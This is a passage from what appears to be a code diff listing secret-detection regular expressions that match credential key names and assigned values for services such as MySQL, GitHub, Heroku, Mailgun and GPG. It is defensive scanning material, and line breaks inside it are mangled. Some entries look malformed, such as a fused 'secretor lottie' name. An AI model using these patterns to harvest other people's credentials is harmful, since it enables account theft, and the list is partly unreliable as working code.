]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?secretaccesskey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?pre[_-]?gyp[_-]?accesskeyid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?node[_-]?env[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ngrok[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ngrok[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nexuspassword[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nexus[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?new[_-]?relic[_-]?beta[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?netlify[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?nativeevents[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysqlsecret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysqlmasteruser[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?root[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?hostname[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mysql[_-]?database[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?my[_-]?secret[_-]?env[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?workspace[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?workflow[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?disconnect[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?connect[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?multi[_-]?bob[_-]?sid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?minio[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?minio[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mile[_-]?zero[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mh[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mh[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mg[_-]?public[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mg[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapboxaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?aws[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?aws[_-]?access[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mapbox[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manifest[_-]?app[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manifest[_-]?app[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mandrill[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?managementapiaccesstoken[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?management[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manage[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?manage[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?secret[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?pub[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?pub[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?priv[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?apikey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailgun[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailer[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailchimp[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mailchimp[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?mail[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?auth[_-]?username [\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?magento[_-]?auth[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?store[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?upload[_-]?cert[_-]?key[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?s3[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?happo[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lottie[_-]?happo[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?looker[_-]?test[_-]?runner[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ll[_-]?shared[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ll[_-]?publish[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?linux[_-]?signing[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?linkedin[_-]?client[_-]?secretor lottie[_-]?s3[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lighthouse[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lektor[_-]?deploy[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?lektor[_-]?deploy[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?leanplum[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kxoltsn3vogdop92m[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kubeconfig[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kubecfg[_-]?s3[_-]?path[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kovan[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?keystore[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?rest[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?instance[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?kafka[_-]?admin[_-]?url[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jwt[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc:mysql[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?jdbc[_-]?databaseurl[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?itest[_-]?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ios[_-]?docs[_-]?deploy[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?internal[_-]?secrets[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?integration[_-]?test[_-]?appid[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?integration[_-]?test[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?index[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ij[_-]?repo[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ij[_-]?repo[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hub[_-]?dxia2[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?homebrew[_-]?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hockeyapp[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?heroku[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hb[_-]?codesign[_-]?key[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hb[_-]?codesign[_-]?gpg[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hab[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?hab[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?grgit[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gren[_-]?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?signing[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?signing[_-]?key[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?publish[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gradle[_-]?publish[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?secret[_-]?keys[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?passphrase[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?ownertrust[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?keyname[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gpg[_-]?key[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?private[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?maps[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?client[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?google[_-]?account[_-]?type[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gogs[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gitlab[_-]?user[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?tokens[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?repo[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?release[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?pwd[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?oauth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?hunter[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?hunter[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?deployment[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?deploy[_-]?hb[_-]?doc[_-]?pass[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?auth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?github[_-]?access[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?committer[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?committer[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?author[_-]?name[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?git[_-]?author[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ghost[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ghb[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?repo[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?unstable[_-]?oauth[_-]?client[_-]?id[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?next[_-]?oauth[_-]?client[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?email[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gh[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcs[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcr[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?service[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?project[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?gcloud[_-]?bucket[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?username[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?user[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?pw[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?ftp[_-]?host[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?fossa[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flickr[_-]?api[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flickr[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?flask[_-]?secret[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firefox[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?project[_-]?develop[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?api[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?firebase[_-]?api[_-]?json[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?file[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?exp[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?eureka[_-]?awssecretkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?sonatype[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?secret[_-]?access[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?secret[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?heroku[_-]?api[_-]?key[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?env[_-]?github[_-]?oauth[_-]?token[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?end[_-]?user[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?encryption[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?elasticsearch[_-]?password[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?elastic[_-]?cloud[_-]?auth[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dsonar[_-]?projectkey[\"']?[^\\S\r + + ]*[=:][^\\S\r + + ]*[\"']?[\\w-]+[\"']?" + - "(?i)[\"']?dsonar[_-]?login[\"']?[^\\S\r + + ]*[=:][^\\S\r + + 